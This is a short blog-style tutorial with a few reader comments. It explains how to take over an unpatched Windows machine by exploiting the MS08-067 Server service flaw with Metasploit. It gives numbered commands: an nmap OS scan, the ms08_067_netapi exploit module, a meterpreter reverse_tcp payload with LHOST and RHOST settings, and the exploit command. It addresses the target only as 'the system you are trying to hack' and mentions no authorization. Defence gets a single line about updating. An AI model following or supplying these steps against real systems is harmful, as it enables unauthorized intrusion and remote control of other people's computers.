Don’t know how to hack Windows With ip address only? So now you will. Yes you can hack Windows with IP address. It’s easy and you can learn it right now.
How To Hack Windows With IP Address?
The answer is by exploiting MS08-067 Server Service Vulnerability.
What is MS08-067 Server Service Vulnerability
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.
The Server service is vulnerable to a remote code-execution vulnerability.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008.
How To Exploit MS08-067
By Metasploit.
What You Need :-
1. IP Address Of The System
2. Kali Linux
You may also like Hacking With Armitage
Steps To Hack Windows With IP Address
1. Open a terminal in Kali and type
nmap -O IpAddress
Replace the ip with the ip address of the system you are trying to hack.
2. Now in a terminal type
msfconsole
The msfconsole is the most popular interface to the Metasploit Framework.
3. Now use the search command to find the Exploit, type
search netapi
4. Now type
use exploit/windows/smb/ms08_067_netapi
5. Now you have to set Payload, you can use reverse TCP Payload for this, type
set payload windows/meterpreter/reverse_tcp”
6. Setting Up, type
set LHOST YourIP
set RHOST IP
Replace YourIP & IP with your ip address & ip of the system you are trying to hack respectively.
7. Time to exploit.
Now type
exploit
In the console, if the Exploit will be successful, you can exploit the computer system using Metasploit commands.
In this way you can hack windows with ip address only !
How To Protect Yourself From This
Keep your system updated! Yes, updates fixes any possible vulnerability.
Like this post then share it with your friends so that we make more posts and tutorials.
Nice website
Thanks for this post
Great
Thanks for this